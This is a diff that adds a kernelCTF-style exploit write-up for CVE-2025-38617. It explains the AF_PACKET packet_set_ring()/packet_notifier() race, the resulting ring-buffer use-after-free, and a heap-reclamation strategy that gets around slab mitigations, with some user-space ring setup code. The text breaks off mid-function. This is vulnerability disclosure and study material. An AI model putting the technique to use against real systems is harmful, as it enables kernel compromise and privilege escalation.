diff --git a/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/exploit.md new file mode 100644 index 000000000..e6b8031c4 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-38617_mitigation_cos/docs/exploit.md @@ -0,0 +1,1646 @@ +# The race +- Described in the patch commit `https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=01d3c8417b9c1b884a8a981a3b886da556512f36` +- Race between `packet_set_ring()` and `packet_notifier()` + +# Analyze the patch +```c +static int packet_notifier(struct notifier_block *this, + unsigned long msg, void *ptr) +{ + struct sock *sk; + struct net_device *dev = netdev_notifier_info_to_dev(ptr); + struct net *net = dev_net(dev); + + rcu_read_lock(); + sk_for_each_rcu(sk, &net->packet.sklist) { + struct packet_sock *po = pkt_sk(sk); + + switch (msg) { + // ... + + case NETDEV_DOWN: + if (dev->ifindex == po->ifindex) { + spin_lock(&po->bind_lock); + if (packet_sock_flag(po, PACKET_SOCK_RUNNING)) { + __unregister_prot_hook(sk, false); + sk->sk_err = ENETDOWN; + if (!sock_flag(sk, SOCK_DEAD)) + sk_error_report(sk); + } + if (msg == NETDEV_UNREGISTER) { + packet_cached_dev_reset(po); + WRITE_ONCE(po->ifindex, -1); + netdev_put(po->prot_hook.dev, + &po->prot_hook.dev_tracker); + po->prot_hook.dev = NULL; + } + spin_unlock(&po->bind_lock); + } + break; + case NETDEV_UP: + if (dev->ifindex == po->ifindex) { + spin_lock(&po->bind_lock); + if (po->num) // [1] + register_prot_hook(sk); + spin_unlock(&po->bind_lock); + } + break; + } + } + rcu_read_unlock(); + return NOTIFY_DONE; +} +``` + +- After we bind a packet socket to a network interface, the following situations can happen: +1. The network interface goes from the DOWN state to the UP state. The packet socket receives a `NETDEV_UP` event and hooks to this network interface. 
Now the packet socket can receive packets sent to the network interface, and the packet socket is considered to be in the `PACKET_SOCK_RUNNING` state. +2. The network interface goes from the UP state to the DOWN state. The packet socket receives a `NETDEV_DOWN` event and unhooks from this network interface. + +```c +static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, + int closing, int tx_ring) +{ + struct pgv *pg_vec = NULL; + struct packet_sock *po = pkt_sk(sk); + unsigned long *rx_owner_map = NULL; + int was_running, order = 0; + struct packet_ring_buffer *rb; + struct sk_buff_head *rb_queue; + __be16 num; + int err; + struct tpacket_req *req = &req_u->req; // request from userspace + + rb = tx_ring ? &po->tx_ring : &po->rx_ring; + rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue; + + // ... + + spin_lock(&po->bind_lock); // [1] + was_running = packet_sock_flag(po, PACKET_SOCK_RUNNING); + num = po->num; + if (was_running) { + WRITE_ONCE(po->num, 0); + __unregister_prot_hook(sk, false); + } + spin_unlock(&po->bind_lock); // [2] + + synchronize_net(); + + err = -EBUSY; + mutex_lock(&po->pg_vec_lock); // [3] + if (closing || atomic_long_read(&po->mapped) == 0) { + // ... + swap(rb->pg_vec, pg_vec); + // ... + po->prot_hook.func = (po->rx_ring.pg_vec) ? tpacket_rcv : packet_rcv; + // ... + } + mutex_unlock(&po->pg_vec_lock); + + spin_lock(&po->bind_lock); + if (was_running) { + WRITE_ONCE(po->num, num); + register_prot_hook(sk); + } + spin_unlock(&po->bind_lock); + // ... +} +``` + +- Reviewing the code from [1] to [2], we can see that: +1. The implementation clearly intends the code that follows to run while the packet socket is not in the `PACKET_SOCK_RUNNING` state, so that no packet is received while the ring buffer is being configured. +2. 
Although both `packet_set_ring()` and `packet_notifier()` take `spin_lock(&po->bind_lock)` to avoid racing with each other, there is still a logic issue: `po->num` is only temporarily set to zero if the packet socket is currently in the running state. If the packet socket is not running, `po->num` keeps its value. +3. That means that after `packet_set_ring()` calls `spin_unlock(&po->bind_lock)`, a `NETDEV_UP` event makes the packet socket rehook to the network interface (see [1] in `packet_notifier()`, which only checks `po->num`). From then on, the packet socket can receive incoming packets while the ring buffer configuration is only halfway done. + +# The UAF +- Assume we win the race: what can we leverage? After analyzing `packet_set_ring()` and `packet_notifier()`, my conclusion is that this race alone gives no directly exploitable primitive. Suppose that `packet_set_ring()` stops executing right after it releases `po->bind_lock`, and `packet_notifier()` finishes bringing the packet socket to the running state. We can now send a packet to the network interface and trigger the hook function on the packet socket. If `packet_set_ring()` resumes at this point, we get a follow-up race condition between the hook function and `packet_set_ring()`. + +- Both the Tx path and the Rx path of a packet socket can be configured to use a ring buffer. +- The ring buffer can be mmapped into user space. +- Switching the Rx path from not using a ring buffer to using one allocates the ring and changes the hook function from `packet_rcv()` to `tpacket_rcv()`. The `->pg_vec` pointer now points to the ring buffer. +- Switching the Rx path from using a ring buffer to not using one frees the old ring buffer and changes the hook function from `tpacket_rcv()` back to `packet_rcv()`. The `->pg_vec` pointer is set back to NULL. 
+- Therefore, by configuring the Rx path to use a ring buffer and then entering `packet_set_ring()` to switch the Rx path back to not using it, we can create a situation where the first half of `packet_set_ring()` races with `packet_notifier()`. At that point, a packet sent to the network interface that this packet socket is hooked to makes the second half of `packet_set_ring()` race with `tpacket_rcv()`. +- Packet sockets come in 3 versions: TPACKET_V1, TPACKET_V2 and TPACKET_V3. The code snippets and discussion below assume the packet socket uses TPACKET_V3. The reason is that a TPACKET_V3 packet socket has an internal data structure that tracks ring buffer usage. This data structure contains a pointer to the ring buffer, and that pointer is not reset to NULL when we switch the packet socket from using a ring buffer to not using one, which can be leveraged for exploitation. While analyzing the code for TPACKET_V1 and TPACKET_V2 packet sockets, I only found a NULL pointer dereference primitive. + +A request to `packet_set_ring()` has the following structure: +```c +struct tpacket_req3 { + unsigned int tp_block_size; /* size of each buffer in the ring buffer */ + unsigned int tp_block_nr; /* number of buffers in the ring buffer */ + unsigned int tp_frame_size; /* frame size */ + unsigned int tp_frame_nr; /* total number of frames */ + unsigned int tp_retire_blk_tov; /* timeout to retire the buffer currently in use */ + unsigned int tp_sizeof_priv; /* per-buffer private space; the kernel code never writes to this space */ + unsigned int tp_feature_req_word; +}; +``` + +- If the packet socket currently does not use a ring buffer, specifying `tp_block_nr != 0` triggers the allocation code path in `packet_set_ring()`. +- If the packet socket currently uses a ring buffer, specifying `tp_block_nr == 0` triggers the free code path in `packet_set_ring()`. 
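
The two request shapes above can be sketched from user space as follows. This is a minimal sketch, not the exploit's actual code: the helper names (`make_alloc_req`, `make_free_req`, `passes_basic_ring_checks`, `select_tpacket_v3`, `apply_rx_ring`) are hypothetical, and the check function mirrors only a subset of the validation in `packet_set_ring()` (it skips the `min_frame_size` and overflow checks).

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/if_packet.h>

/* Hypothetical helper: build a request that takes the allocation path
 * (tp_block_nr != 0). tp_frame_nr is derived so that it matches
 * frames_per_block * tp_block_nr, as packet_set_ring() requires. */
struct tpacket_req3 make_alloc_req(unsigned int block_size, unsigned int block_nr,
                                   unsigned int frame_size, unsigned int sizeof_priv)
{
    struct tpacket_req3 req;

    assert(frame_size != 0);
    memset(&req, 0, sizeof(req));
    req.tp_block_size = block_size;
    req.tp_block_nr = block_nr;
    req.tp_frame_size = frame_size;
    req.tp_frame_nr = (block_size / frame_size) * block_nr;
    req.tp_sizeof_priv = sizeof_priv;
    return req;
}

/* Hypothetical helper: an all-zero request. tp_block_nr == 0 selects the
 * free path, and tp_frame_nr must also be 0 or the kernel returns -EINVAL. */
struct tpacket_req3 make_free_req(void)
{
    struct tpacket_req3 req;

    memset(&req, 0, sizeof(req));
    return req;
}

/* Subset of the checks done on the allocation path; returns 1 if they pass. */
int passes_basic_ring_checks(const struct tpacket_req3 *req, unsigned int page_size)
{
    unsigned int frames_per_block;

    if ((int)req->tp_block_size <= 0)
        return 0;
    if (req->tp_block_size % page_size != 0)
        return 0;
    if (req->tp_frame_size == 0 || (req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
        return 0;
    frames_per_block = req->tp_block_size / req->tp_frame_size;
    if (frames_per_block == 0)
        return 0;
    return frames_per_block * req->tp_block_nr == req->tp_frame_nr;
}

/* Select TPACKET_V3; must be done before any ring exists on the socket. */
int select_tpacket_v3(int fd)
{
    int version = TPACKET_V3;

    return setsockopt(fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
}

/* Apply a request to the Rx ring; this reaches packet_set_ring() with tx_ring == 0. */
int apply_rx_ring(int fd, const struct tpacket_req3 *req)
{
    return setsockopt(fd, SOL_PACKET, PACKET_RX_RING, req, sizeof(*req));
}
```

A typical sequence would be `select_tpacket_v3(fd)`, then `apply_rx_ring(fd, &alloc_req)` to allocate, and later `apply_rx_ring(fd, &free_req)` to enter the free path. Opening the `AF_PACKET` socket itself needs `CAP_NET_RAW` (for example inside a user and network namespace).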
+ +```c +struct packet_ring_buffer { + struct pgv *pg_vec; // internal ring buffer + + unsigned int head; + unsigned int frames_per_block; + unsigned int frame_size; + unsigned int frame_max; + + unsigned int pg_vec_order; + unsigned int pg_vec_pages; + unsigned int pg_vec_len; + + unsigned int __percpu *pending_refcnt; + + union { + unsigned long *rx_owner_map; // use by TPACKET_V1 and TPACKET_V2 + struct tpacket_kbdq_core prb_bdqc; // use by TPACKET_V3 + }; +}; +``` + +```c +struct packet_sock { + // ... + struct packet_ring_buffer rx_ring; // rx_ring_buffer + struct packet_ring_buffer tx_ring; // tx_ring_buffer + // ... +}; +``` + +`packet_set_ring()` code related to the allocation of TPACKET_V3 Rx ring buffer +```c +static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, + int closing, int tx_ring) +{ + struct pgv *pg_vec = NULL; + struct packet_sock *po = pkt_sk(sk); + unsigned long *rx_owner_map = NULL; + int was_running, order = 0; + struct packet_ring_buffer *rb; + struct sk_buff_head *rb_queue; + __be16 num; + int err; + struct tpacket_req *req = &req_u->req; // request from userspace + + rb = tx_ring ? &po->tx_ring : &po->rx_ring; + rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue; + + // ... + + if (req->tp_block_nr) { + unsigned int min_frame_size; + err = -EBUSY; + if (unlikely(rb->pg_vec)) + goto out; + + switch (po->tp_version) { + // ... 
+ case TPACKET_V3: + po->tp_hdrlen = TPACKET3_HDRLEN; + break; + } + + err = -EINVAL; + if (unlikely((int)req->tp_block_size <= 0)) + goto out; + if (unlikely(!PAGE_ALIGNED(req->tp_block_size))) + goto out; + min_frame_size = po->tp_hdrlen + po->tp_reserve; + if (po->tp_version >= TPACKET_V3 && + req->tp_block_size < + BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size) + goto out; + if (unlikely(req->tp_frame_size < min_frame_size)) + goto out; + if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1))) + goto out; + + rb->frames_per_block = req->tp_block_size / req->tp_frame_size; + if (unlikely(rb->frames_per_block == 0)) + goto out; + if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr)) + goto out; + if (unlikely((rb->frames_per_block * req->tp_block_nr) != + req->tp_frame_nr)) + goto out; + + err = -ENOMEM; + order = get_order(req->tp_block_size); // [1] + pg_vec = alloc_pg_vec(req, order); // [2] + if (unlikely(!pg_vec)) + goto out; + switch (po->tp_version) { + case TPACKET_V3: + if (!tx_ring) { + init_prb_bdqc(po, rb, pg_vec, req_u); // [3] + } else { + // ... + } + break; + // ... + } + // ... + + mutex_lock(&po->pg_vec_lock); + if (closing || atomic_long_read(&po->mapped) == 0) { + err = 0; + spin_lock_bh(&rb_queue->lock); + swap(rb->pg_vec, pg_vec); + if (po->tp_version <= TPACKET_V2) + swap(rb->rx_owner_map, rx_owner_map); + rb->frame_max = (req->tp_frame_nr - 1); + rb->head = 0; + rb->frame_size = req->tp_frame_size; + spin_unlock_bh(&rb_queue->lock); + + swap(rb->pg_vec_order, order); + swap(rb->pg_vec_len, req->tp_block_nr); + + rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE; + po->prot_hook.func = (po->rx_ring.pg_vec) ? + tpacket_rcv : packet_rcv; + // ... + } + mutex_unlock(&po->pg_vec_lock); + // ... 
+} +``` + +Explain for [1]: +```c +/** + * get_order - Determine the allocation order of a memory size + * @size: The size for which to get the order + * + * Determine the allocation order of a particular sized block of memory. This + * is on a logarithmic scale, where: + * + * 0 -> 2^0 * PAGE_SIZE and below + * 1 -> 2^1 * PAGE_SIZE to 2^0 * PAGE_SIZE + 1 + * 2 -> 2^2 * PAGE_SIZE to 2^1 * PAGE_SIZE + 1 + * 3 -> 2^3 * PAGE_SIZE to 2^2 * PAGE_SIZE + 1 + * 4 -> 2^4 * PAGE_SIZE to 2^3 * PAGE_SIZE + 1 + * ... + * + * The order returned is used to find the smallest allocation granule required + * to hold an object of the specified size. + */ +static __always_inline __attribute_const__ int get_order(unsigned long size); +``` + +Explain for [2]: +```c +/** + * alloc_pg_vec - Allocate memory for ring buffer + * @req: request from userspace. req->tp_block_nr : Determine how many buffer the ring have + * @order: Determine each buffer size + * (for example: + * order == 0 => buffer_size: (2 ** 0) * 4096 == 4096 + * order == 1 => buffer_size: (2 ** 1) * 4096 = 8192 + * order == 2 => buffer_size: (2 ** 2) * 4096 = 16384 + * ... + */ + +static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order) +{ + unsigned int block_nr = req->tp_block_nr; + struct pgv *pg_vec; + int i; + + pg_vec = kcalloc(block_nr, sizeof(struct pgv), GFP_KERNEL | __GFP_NOWARN); + if (unlikely(!pg_vec)) + goto out; + + for (i = 0; i < block_nr; i++) { + pg_vec[i].buffer = alloc_one_pg_vec_page(order); + if (unlikely(!pg_vec[i].buffer)) + goto out_free_pgvec; + } + +out: + return pg_vec; + +out_free_pgvec: + free_pg_vec(pg_vec, order, block_nr); + pg_vec = NULL; + goto out; +} +``` +Explain for [3]: +```c +/** + * init_prb_bdqc - Initialize the internal data structure to track Rx ring buffer usage. Only TPACKET_V3 packet socket use this structure. + * @rb: Data structure used by packet socket to manage ring buffer. + * @pg_vec: The freshly allocated ring buffer. 
+ * @req_u: Request from user space + */ +static void init_prb_bdqc(struct packet_sock *po, + struct packet_ring_buffer *rb, + struct pgv *pg_vec, + union tpacket_req_u *req_u) +{ + struct tpacket_kbdq_core *pkc = &rb->prb_bdqc; + struct tpacket_block_desc *pbd; + + memset(pkc, 0x0, sizeof(*pkc)); + + pkc->knxt_seq_num = 1; + pkc->pkbdq = pg_vec; + pbd = (struct tpacket_block_desc *)pg_vec[0].buffer; + pkc->pkblk_start = pg_vec[0].buffer; + pkc->kblk_size = req_u->req3.tp_block_size; + pkc->knum_blocks = req_u->req3.tp_block_nr; + pkc->hdrlen = po->tp_hdrlen; + pkc->version = po->tp_version; + pkc->last_kactive_blk_num = 0; + pkc->blk_sizeof_priv = req_u->req3.tp_sizeof_priv; + pkc->max_frame_len = pkc->kblk_size - (48 + ALIGN((pkc->blk_sizeof_priv), 8)); + prb_open_block(pkc, pbd); +} +``` +- `pkc->pkbdq` : Pointer to the ring buffer. +- `pkc->kblk_size` : Size of each buffer in the ring buffer +- `pkc->knum_blocks` : Number of buffers in the ring buffer +- `pkc->hdrlen` : 68 (for a TPACKET_V3 packet socket) +- `pkc->version` : `TPACKET_V3` +- `pkc->blk_sizeof_priv` : Private space per buffer in the ring buffer +- `pbd` : First buffer of the ring buffer + +```c +/** + * prb_open_block - Mark a buffer as the target for future packet header and packet data writes + * @pkc: Data structure to track ring buffer usage + * @pbd: The buffer to mark + */ +static void prb_open_block(struct tpacket_kbdq_core *pkc, struct tpacket_block_desc *pbd) +{ + struct timespec64 ts; + struct tpacket_hdr_v1 *h1 = &pbd->hdr.bh1; + + BLOCK_SNUM(pbd) = pkc->knxt_seq_num++; + BLOCK_NUM_PKTS(pbd) = 0; + BLOCK_LEN(pbd) = BLK_PLUS_PRIV(pkc->blk_sizeof_priv); + + pkc->pkblk_start = (char *)pbd; + pkc->nxt_offset = pkc->pkblk_start + BLK_PLUS_PRIV(pkc->blk_sizeof_priv); + + BLOCK_O2FP(pbd) = (__u32)BLK_PLUS_PRIV(pkc->blk_sizeof_priv); + BLOCK_O2PRIV(pbd) = BLK_HDR_LEN; + + pbd->version = pkc->version; + pkc->prev = pkc->nxt_offset; + pkc->pkblk_end = pkc->pkblk_start + pkc->kblk_size; +} + +#define V3_ALIGNMENT (8) +#define 
BLK_HDR_LEN (ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT)) +#define BLK_PLUS_PRIV(sz_of_priv) (BLK_HDR_LEN + ALIGN((sz_of_priv), V3_ALIGNMENT)) +``` + +- `pkc->pkblk_start` : beginning of the buffer. +- `pkc->nxt_offset` : where the headers and packet data will be written in the buffer. +- `pkc->pkblk_end` : end of the buffer. + +`packet_set_ring()` code path related to where the ring buffer is freed +```c +static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u, + int closing, int tx_ring) +{ + struct pgv *pg_vec = NULL; + struct packet_sock *po = pkt_sk(sk); + unsigned long *rx_owner_map = NULL; + int was_running, order = 0; + struct packet_ring_buffer *rb; + struct sk_buff_head *rb_queue; + __be16 num; + int err; + struct tpacket_req *req = &req_u->req; + + rb = tx_ring ? &po->tx_ring : &po->rx_ring; + rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue; + + err = -EBUSY; + if (!closing) { + if (atomic_long_read(&po->mapped)) + goto out; + if (packet_read_pending(rb)) + goto out; + } + + if (req->tp_block_nr) { + // ... + } + else { + err = -EINVAL; + if (unlikely(req->tp_frame_nr)) + goto out; + } + + // ... + mutex_lock(&po->pg_vec_lock); + if (closing || atomic_long_read(&po->mapped) == 0) { + err = 0; + spin_lock_bh(&rb_queue->lock); + swap(rb->pg_vec, pg_vec); // [1] Reset ring buffer pointer to NULL + if (po->tp_version <= TPACKET_V2) + swap(rb->rx_owner_map, rx_owner_map); + rb->frame_max = (req->tp_frame_nr - 1); + rb->head = 0; + rb->frame_size = req->tp_frame_size; + spin_unlock_bh(&rb_queue->lock); + + swap(rb->pg_vec_order, order); + swap(rb->pg_vec_len, req->tp_block_nr); + + rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE; + po->prot_hook.func = (po->rx_ring.pg_vec) ? + tpacket_rcv : packet_rcv; + skb_queue_purge(rb_queue); + if (atomic_long_read(&po->mapped)) + pr_err("packet_mmap: vma is busy: %ld\n", + atomic_long_read(&po->mapped)); + } + mutex_unlock(&po->pg_vec_lock); + + // ... 
+ if (pg_vec) { + bitmap_free(rx_owner_map); + free_pg_vec(pg_vec, order, req->tp_block_nr); // [2] Where the ring buffer is freed + } +``` + +```c +static void free_pg_vec(struct pgv *pg_vec, unsigned int order, + unsigned int len) +{ + int i; + + for (i = 0; i < len; i++) { + if (likely(pg_vec[i].buffer)) { + if (is_vmalloc_addr(pg_vec[i].buffer)) + vfree(pg_vec[i].buffer); + else + free_pages((unsigned long)pg_vec[i].buffer, + order); + pg_vec[i].buffer = NULL; // [1] + } + } + kfree(pg_vec); +} +``` + +[1] : Reset every buffer pointer in the ring buffer to NULL + +`tpacket_rcv()` code path related to where UAF happen +```c +/** + * tpacket_rcv: Hook function to handle packet sent to the network interface that the packet socket hooked to. + * @skb: the packet + * @dev: the network interface + * @pt: represent the hook structure + */ +static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev, + struct packet_type *pt, struct net_device *orig_dev) +{ + enum skb_drop_reason drop_reason = SKB_CONSUMED; + struct sock *sk = NULL; + struct packet_sock *po; + struct sockaddr_ll *sll; + union tpacket_uhdr h; + u8 *skb_head = skb->data; + int skb_len = skb->len; + unsigned int snaplen, res; + unsigned long status = TP_STATUS_USER; + unsigned short macoff, hdrlen; + unsigned int netoff; + struct sk_buff *copy_skb = NULL; + struct timespec64 ts; + __u32 ts_status; + unsigned int slot_id = 0; + int vnet_hdr_sz = 0; + + sk = pt->af_packet_priv; + po = pkt_sk(sk); + // ... + + snaplen = skb->len; + res = run_filter(skb, sk, snaplen); // [5] + + // ... + + if (snaplen > res) + snaplen = res; + + if (sk->sk_type == SOCK_DGRAM) { + // ... + } else { + unsigned int maclen = skb_network_offset(skb); + netoff = TPACKET_ALIGN(po->tp_hdrlen + + (maclen < 16 ? 16 : maclen)) + + po->tp_reserve; + vnet_hdr_sz = READ_ONCE(po->vnet_hdr_sz); + if (vnet_hdr_sz) + netoff += vnet_hdr_sz; + macoff = netoff - maclen; + } + + // ... 
+ spin_lock(&sk->sk_receive_queue.lock); + h.raw = packet_current_rx_frame(po, skb, // [1] + TP_STATUS_KERNEL, (macoff+snaplen)); + + // ... + spin_unlock(&sk->sk_receive_queue.lock); + skb_copy_bits(skb, 0, h.raw + macoff, snaplen); // [2] + // ... + switch (po->tp_version) { + // ... + case TPACKET_V3: // [3] + h.h3->tp_status |= status; + h.h3->tp_len = skb->len; + h.h3->tp_snaplen = snaplen; + h.h3->tp_mac = macoff; + h.h3->tp_net = netoff; + h.h3->tp_sec = ts.tv_sec; + h.h3->tp_nsec = ts.tv_nsec; + memset(h.h3->tp_padding, 0, sizeof(h.h3->tp_padding)); + hdrlen = sizeof(*h.h3); + break; + default: + BUG(); + } + + sll = h.raw + TPACKET_ALIGN(hdrlen); // [4] + sll->sll_halen = dev_parse_header(skb, sll->sll_addr); + sll->sll_family = AF_PACKET; + sll->sll_hatype = dev->type; + sll->sll_protocol = (sk->sk_type == SOCK_DGRAM) ? + vlan_get_protocol_dgram(skb) : skb->protocol; + sll->sll_pkttype = skb->pkt_type; + if (unlikely(packet_sock_flag(po, PACKET_SOCK_ORIGDEV))) + sll->sll_ifindex = orig_dev->ifindex; + else + sll->sll_ifindex = dev->ifindex; + + // ... +} +``` +- [1] : where UAF happen. +- [2] : where we write with control data from our packet. +- [3] and [4] : where non control data written. + +Call chain from [1]: `packet_current_rx_frame()` -> `__packet_lookup_frame_in_block()` + +```c +static void *packet_current_rx_frame(struct packet_sock *po, + struct sk_buff *skb, + int status, unsigned int len) +{ + switch (po->tp_version) { + // ... + case TPACKET_V3: + return __packet_lookup_frame_in_block(po, skb, len); + // ... +} +``` + +```c +/** + * __packet_lookup_frame_in_block : find frame in the ring buffer to write headers and packet data to. 
+ * @skb: packet sent to the network interface that the packet socket hooked to + * @len: packet length + */ +static void *__packet_lookup_frame_in_block(struct packet_sock *po, + struct sk_buff *skb, + unsigned int len + ) +{ + struct tpacket_kbdq_core *pkc; + struct tpacket_block_desc *pbd; + char *curr, *end; + + pkc = &po->rx_ring.prb_bdqc; + pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; + + // ... + + curr = pkc->nxt_offset; + pkc->skb = skb; + end = (char *)pbd + pkc->kblk_size; + + if (curr + (ALIGN(len, 8)) < end) { + prb_fill_curr_block(curr, pkc, pbd, len); + return (void *)curr; + } + + prb_retire_current_block(pkc, po, 0); // [1] + + curr = (char *)prb_dispatch_next_block(pkc, po); + if (curr) { + pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc); + prb_fill_curr_block(curr, pkc, pbd, len); + return (void *)curr; + } + + return NULL; +} +``` + +Assume the ring buffer is freed at this point and this is the first time `tpacket_rcv()` is triggered, we have the following things: +- `pkc->kactive_blk_num == 0` +- `pkc->pkbdq` : UAF pointer to old freed ring buffer. +- `pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer` => `pbd` is UAF pointer +- `curr = pkc->nxt_offset` : pointer to the old freed buffer from the old freed ring (check `prb_open_block()` analysis above) => `pkc->nxt_offset` is UAF pointer +- `end = (char *)pbd + pkc->kblk_size` => `end` is UAF Pointer + +Remember, before the ring buffer is freed, every buffer pointer in the ring buffer is reset to NULL. 
If we do not manage to reclaim the ring buffer, the kernel panics for the following reasons: +- `curr` : a kernel address +- `pbd == 0` => `end` has a small value => `curr + len > end` => `prb_retire_current_block()` is called at [1] + +```c +static void prb_retire_current_block(struct tpacket_kbdq_core *pkc, + struct packet_sock *po, unsigned int status) +{ + struct tpacket_block_desc *pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; // pbd == 0 + + if ((TP_STATUS_KERNEL == pbd->hdr.bh1.block_status)) { // NULL pointer dereference + if (!(status & TP_STATUS_BLK_TMO)) { + write_lock(&pkc->blk_fill_in_prog_lock); + write_unlock(&pkc->blk_fill_in_prog_lock); + } + prb_close_block(pkc, pbd, po, status); + return; + } +} +``` + +Assume we manage to reclaim the ring buffer before the UAF happens: which object should we use for the reclamation? I decided to use another packet socket and allocate a Tx ring buffer for the reclamation, for the following reasons: + +- `CONFIG_RANDOM_KMALLOC_CACHES` mitigation : Introduces multiple generic slab caches for each size, 16 by default (named kmalloc-rnd-01-32, kmalloc-rnd-02-32 etc.). When an object is allocated via `kmalloc()`, it is placed in one of these 16 caches "randomly", depending on the callsite of the `kmalloc()` and a per-boot seed. +- `CONFIG_SLAB_VIRTUAL` mitigation : Ensures that a virtual address used for one slab cache type will only ever be used for that slab cache type. +- With these two mitigations, I have no choice but to use a ring buffer itself to reclaim the freed ring buffer: both allocations come from the same callsite, which works around both `CONFIG_RANDOM_KMALLOC_CACHES` and `CONFIG_SLAB_VIRTUAL`. +- I chose a Tx ring buffer because the kernel does not fill the buffers of a Tx ring with anything, so all buffers start out zeroed, and the allocation of a Tx ring buffer runs faster because it takes a shorter code path than the Rx ring buffer. 
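
Both rings get their `pg_vec` array from the same `kcalloc()` call in `alloc_pg_vec()`, so the callsite is identical and what remains is to match the size class. The arithmetic can be sketched as below. This is a rough sketch under stated assumptions: `struct pgv_sketch` stands in for the kernel's `struct pgv` (assumed to hold a single pointer), the size-class table is the usual generic kmalloc set on x86_64 and may differ on other configurations, and the page size is assumed to be 4096.

```c
#include <assert.h>
#include <stddef.h>

/* Assumption: struct pgv holds exactly one buffer pointer (8 bytes on 64-bit). */
struct pgv_sketch {
    char *buffer;
};

/* Bytes requested by kcalloc(block_nr, sizeof(struct pgv), ...) in alloc_pg_vec(). */
size_t pg_vec_bytes(unsigned int block_nr)
{
    return (size_t)block_nr * sizeof(struct pgv_sketch);
}

/* Assumed generic kmalloc size classes; returns 0 if the request is larger
 * than the table. */
size_t kmalloc_size_class(size_t bytes)
{
    static const size_t classes[] = {
        8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
    };
    size_t i;

    for (i = 0; i < sizeof(classes) / sizeof(classes[0]); i++)
        if (bytes <= classes[i])
            return classes[i];
    return 0;
}

/* Page order needed for one block, mirroring get_order() for 4096-byte pages. */
int block_order(size_t block_size)
{
    size_t span = 4096;
    int order = 0;

    assert(block_size > 0);
    while (span < block_size) {
        span <<= 1;
        order++;
    }
    return order;
}
```

With the same `tp_block_nr` on the victim and the reclaiming socket, `pg_vec_bytes()` is identical for both, so both arrays land in the same size class regardless of the per-block size. `block_order()` only affects which page order backs each individual buffer.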
+ +The specific strategy used in the exploit looks like this: +- The victim packet socket's freed ring buffer has X buffers (X > 1). The size of each buffer is ((2 ** Y) * PAGE_SIZE) (Y > 1). +- The ring buffer used for reclamation also has X buffers, so `kmalloc()` allocates from the same slab cache. The size of each buffer is ((2 ** (Y - 1)) * PAGE_SIZE). + +Assuming the reclamation succeeds, we can look at the function `__packet_lookup_frame_in_block()` again with a new view. + +```c +static void *__packet_lookup_frame_in_block(struct packet_sock *po, + struct sk_buff *skb, + unsigned int len + ) +{ + struct tpacket_kbdq_core *pkc; + struct tpacket_block_desc *pbd; + char *curr, *end; + + pkc = &po->rx_ring.prb_bdqc; + pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; + + // ... + + curr = pkc->nxt_offset; + pkc->skb = skb; + end = (char *)pbd + pkc->kblk_size; + + if (curr + (ALIGN(len, 8)) < end) { + prb_fill_curr_block(curr, pkc, pbd, len); // [1] + return (void *)curr; + } + + prb_retire_current_block(pkc, po, 0); // [2] + + curr = (char *)prb_dispatch_next_block(pkc, po); // [3] + if (curr) { + pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc); + prb_fill_curr_block(curr, pkc, pbd, len); + return (void *)curr; + } + + return NULL; +} +``` + +- `pkc->kactive_blk_num == 0` +- `pkc->pkbdq` : now contains the reclamation ring buffer +- `pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer` : first buffer of the reclamation ring buffer +- `curr = pkc->nxt_offset` : pointer into the old freed buffer from the old freed ring +- `end = (char *)pbd + pkc->kblk_size`: `pbd` plus the block size recorded for the victim ring + +#### Assume we manage to groom pages in such a way that `end` comes from a lower address and `curr` comes from a higher address: we then avoid the code path at [1] and enter `prb_retire_current_block()`. 
+ +```c +static void prb_retire_current_block(struct tpacket_kbdq_core *pkc, + struct packet_sock *po, unsigned int status) +{ + struct tpacket_block_desc *pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; + + if ((TP_STATUS_KERNEL == BLOCK_STATUS(pbd))) { + if (!(status & TP_STATUS_BLK_TMO)) { + write_lock(&pkc->blk_fill_in_prog_lock); + write_unlock(&pkc->blk_fill_in_prog_lock); + } + prb_close_block(pkc, pbd, po, status); + return; + } +} +``` +- `TP_STATUS_KERNEL == 0` +- `pbd` : first buffer of the reclamation ring buffer (the pages backing these buffers start out all zeros) => `prb_close_block()` is called. + +```c +static void prb_close_block(struct tpacket_kbdq_core *pkc, + struct tpacket_block_desc *pbd1, + struct packet_sock *po, unsigned int stat) +{ + // ... + + pkc->kactive_blk_num = ((pkc->kactive_blk_num < (pkc->knum_blocks-1)) ? \ + (pkc->kactive_blk_num+1) : 0); +} +``` + +- Now, `pkc->kactive_blk_num == 1`. Back at [3] in `__packet_lookup_frame_in_block()`, the function `prb_dispatch_next_block()` is called. + +```c +static void *prb_dispatch_next_block(struct tpacket_kbdq_core *pkc, + struct packet_sock *po) +{ + struct tpacket_block_desc *pbd; + + // ... + pbd = pkc->pkbdq[pkc->kactive_blk_num].buffer; + + // ... + + prb_open_block(pkc, pbd); + return (void 